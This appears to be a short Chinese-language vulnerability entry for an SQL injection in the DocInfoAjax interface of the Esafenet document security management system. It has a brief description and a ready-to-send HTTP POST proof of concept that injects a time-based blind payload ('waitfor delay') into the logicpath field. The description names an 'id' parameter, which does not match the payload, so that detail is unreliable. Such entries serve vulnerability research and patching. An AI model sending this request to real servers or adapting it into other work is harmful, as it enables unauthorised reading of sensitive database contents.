亿赛通电子文档安全管理系统 DocInfoAjax SQL注入漏洞

Description

由于亿赛通电子文档安全管理系统 DocInfoAjax接口的id参数处对传入的数据没有预编译和充足的校验,导致该接口存在SQL注入漏洞,未授权的攻击者可获取数据库敏感信息。

PoC

POST /CDGServer3/js/../DocInfoAjax HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

command=JudgeHasFile&logicpath==-1'waitfor delay '0:0:5'--

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

Related Vulnerabilities